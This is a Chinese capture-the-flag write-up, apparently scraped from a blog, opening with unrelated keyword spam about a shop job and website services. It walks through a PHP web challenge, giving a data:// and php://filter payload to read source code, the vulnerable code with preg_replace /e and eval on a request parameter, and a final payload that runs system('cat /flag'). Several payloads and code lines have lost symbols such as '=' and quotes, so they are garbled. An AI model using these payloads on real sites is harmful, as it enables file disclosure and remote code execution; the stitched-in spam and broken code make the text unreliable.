青浦网站招营业员做一休一,Joomla外贸网站模板,用什么软件做介绍视频网站,北京网络搭建公司1、点开连接#xff0c;页面出现了提示 传入一个参数text#xff0c;里面的内容要包括I have a dream。 构造#xff1a;?/textI have a dream。发现页面没有显示。这里推测可能得使用伪协议 在文件包含那一行#xff0c;我们看到了next.php的提示#xff0c;我们尝试读取…1、点开连接页面出现了提示 传入一个参数text里面的内容要包括I have a dream。 构造?/textI have a dream。发现页面没有显示。这里推测可能得使用伪协议 在文件包含那一行我们看到了next.php的提示我们尝试读取文件 根据代码我们构造payload /?textdata://text/plain,I have a dreamfilephp://filter/convert.base64-encode/resourcenext.php 2、页面出现base64编码 3、解码之后得到一串代码
?php
$id $_GET[id];
$_SESSION[id] $id;function complex($re, $str) {return preg_replace(/( . $re . )/ei,strtolower(\\1),$str);
}foreach($_GET as $re $str) {echo complex($re, $str). \n;
}function getFlag(){eval($_GET[cmd]);
}4、分析代码 定义了一个名为 complex 的函数用于对字符串进行正则替换操作。具体来说它会将匹配到的字符串转换为小写。
/ei:当作php代码来执行忽略大小写
定义了一个getFlag函数将参数cmd中的参数输出
5、由此我们可以构造新payload /?textdata://text/pain,I have a dreamfilenext.php\S*${getFlag()}cmdsystem(cat /flag); 使用正则表达式匹配一个或多个非空白字符\S*然后将其赋值给一个变量。
